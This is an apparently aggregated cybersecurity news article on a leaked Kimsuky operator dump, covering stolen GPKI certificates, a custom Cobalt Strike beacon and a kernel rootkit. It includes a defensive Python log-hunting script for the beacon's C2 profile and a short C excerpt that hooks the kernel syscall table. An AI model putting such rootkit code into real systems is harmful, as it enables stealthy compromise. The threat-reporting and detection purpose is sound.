    This leak offers an unprecedented window into the group’s espionage toolkit, revealing how Kimsuky conducts phishing campaigns, maintains persistence and evades detection within critical networks across South Korea, the U.S., Japan and Europe.

    Within hours of its posting, Foresiet analysts identified a wealth of artifacts—including browser histories, rootkit modules and stale GPKI certificates—that promise years of insight into DPRK cyber operations.

    Foresiet researchers noted that the first dataset originated from the operator’s personal Deepin Linux virtual machine, complete with HGFS integration that preserved the host’s C:\ drive contents.

    A desktop screenshot captures the attacker’s environment, showing custom proxy and user-agent extensions loaded in Chrome and Brave browsers.

    Kimsuky APT group dump (Source – Foresiet)

    The same VM dump revealed nearly 20,000 browser history records, exposing email addresses used for spear-phishing and links to internal backdoor documentation, such as a Chinese-language user guide for a custom implant.

    The second dataset derived from a public-facing VPS hosted on vps.bz, where detailed auth.log files and SSL certificates were recovered.

    These logs traced live spear-phishing operations against South Korea’s Defense Counterintelligence Command (dcc.mil.kr), the Supreme Prosecutor’s Office (spo.go.kr) and other high-value targets.

    Among the most concerning finds were thousands of stolen South Korean Government Public Key Infrastructure (GPKI) certificates and their cracking tool, written in Java, enabling Kimsuky to impersonate officials and sign fraudulent documents without detection.

    Kimsuky’s implant suite includes the Tomcat Kernel Rootkit, a loadable Linux module that hooks network functions for stealthy reverse shells, and a personalized Cobalt Strike beacon.

    The beacon, last updated in June 2024, is embedded with custom C2 profiles and partially integrated with the kernel rootkit.

    It uses HTTP over port 8172, posting to /submit.php with a spoofed IE9 user-agent string.

    This bespoke build demonstrates that Kimsuky is merging open-source frameworks with proprietary code to evade conventional detection.
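The beacon profile just described (HTTP POST to /submit.php on port 8172 with an IE9 user agent) can be hunted in web-proxy logs, and because a Cobalt Strike beacon checks in on a timer, the inter-request timing separates it from a one-off hit. The Python below is an added example, not part of the leak or of Foresiet's analysis; the exact IE9 user-agent string and the log format are assumptions, and the sample log lines are constructed.

```python
"""Hunt proxy logs for the beacon profile above, then test whether matching requests
from a host recur at a regular (low-jitter) interval, the signature of a timed check-in."""
import statistics
from collections import defaultdict

BEACON_PORT = 8172
BEACON_URI = "/submit.php"
IE9_MARKER = "MSIE 9.0"   # the report names an IE9 user agent but not the exact string


def parse_line(line):
    """Constructed format: ts, src, dst, dport, method, uri, user_agent (tab-separated)."""
    ts, src, dst, dport, method, uri, ua = line.rstrip("\n").split("\t")
    return {"ts": float(ts), "src": src, "dst": dst, "dport": int(dport),
            "method": method, "uri": uri, "ua": ua}


def matches_profile(rec):
    """True when method, URI, port and user agent all fit the beacon's C2 profile."""
    return (rec["method"] == "POST" and rec["uri"] == BEACON_URI
            and rec["dport"] == BEACON_PORT and IE9_MARKER in rec["ua"])


def interval_stats(timestamps):
    """Return (median_gap, jitter) with jitter = pstdev/median of gaps; None if fewer than 3 hits."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return None
    median = statistics.median(gaps)
    return median, (statistics.pstdev(gaps) / median if median else float("inf"))


def hunt(log_text, max_jitter=0.25):
    """Group profile matches per (src, dst) and report whether their timing looks like beaconing."""
    by_pair = defaultdict(list)
    for line in log_text.strip().splitlines():
        if line.startswith("#"):
            continue
        rec = parse_line(line)
        if matches_profile(rec):
            by_pair[(rec["src"], rec["dst"])].append(rec["ts"])
    findings = []
    for (src, dst), ts in by_pair.items():
        stats = interval_stats(ts)
        if stats is None:
            continue
        median, jitter = stats
        findings.append({"src": src, "dst": dst, "count": len(ts),
                         "median_interval_s": median, "jitter": round(jitter, 3),
                         "beaconing": jitter <= max_jitter})
    return findings


# Constructed sample: one host checking in roughly every 60 s, one host with irregular hits,
# and two unrelated requests that must not match the profile.
IE9_UA = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"   # assumed
CHROME_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"
SAMPLE_PROXY_LOG = "\n".join([
    "#fields\tts\tsrc\tdst\tdport\tmethod\turi\tuser_agent",
    *(f"{t}\t10.0.0.12\t203.0.113.50\t8172\tPOST\t/submit.php\t{IE9_UA}" for t in (1000, 1060, 1121, 1179, 1240)),
    f"1002\t10.0.0.12\t203.0.113.50\t80\tGET\t/index.html\t{CHROME_UA}",
    *(f"{t}\t10.0.0.20\t203.0.113.50\t8172\tPOST\t/submit.php\t{IE9_UA}" for t in (2000, 2005, 2400)),
    f"2100\t10.0.0.31\t203.0.113.50\t443\tPOST\t/submit.php\t{CHROME_UA}",
])

if __name__ == "__main__":
    for finding in hunt(SAMPLE_PROXY_LOG):
        print(finding)
```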

    Persistence Tactics

    One of the most sophisticated persistence mechanisms uncovered is the Tomcat Kernel Rootkit.

    After initial installation via a crafted installer script, the rootkit registers itself in the kernel’s module list and patches key functions in inet_sock_create and tcp_v4_connect to enable port knocking and SSL reverse shells.

    Attacker’s desktop environment running on Deepin Linux 20.9 (Source – Foresiet)

    A simplified excerpt from its init routine illustrates how it hooks the system call table:

    static int __init rootkit_init(void) {
        write_cr0(read_cr0() & (~0x10000));                     /* clear CR0.WP so the read-only syscall table can be written */
        original_syscall = syscall_table[__NR_kill];             /* save the genuine sys_kill entry for later restoration */
        syscall_table[__NR_kill] = (unsigned long)hooked_kill;   /* redirect kill(2) into the implant's handler */
        write_cr0(read_cr0() | 0x10000);                         /* restore write protection to hide the modification */
        return 0;
    }

    This kernel-level implant allows the operator to remain undetected by user-space monitoring tools, forcing defenders to deploy specialized host-based detection rules.

    By combining encrypted C2 traffic with port-knock authorization, the module ensures that only pre-authenticated connections can trigger the backdoor, effectively masking its presence within normal network flows.


    The post Kimsuky APT Data Leak – GPKI Certificates, Rootkits and Cobalt Strike Personal Uncovered appeared first on Cyber Security News.


  • A significant data dump surfaced on DDoSecrets.com, purportedly extracted from a workstation belonging to a threat actor targeting organizations in South Korea and Taiwan. The leak, detailed in an accompanying article, attributes the activity to the North Korean advanced persistent threat (APT) group known as Kimsuky, a sophisticated actor previously highlighted in cybersecurity advisories for […]

    The post Chinese APT Leverages Proxy and VPN Services to Obfuscate Infrastructure appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
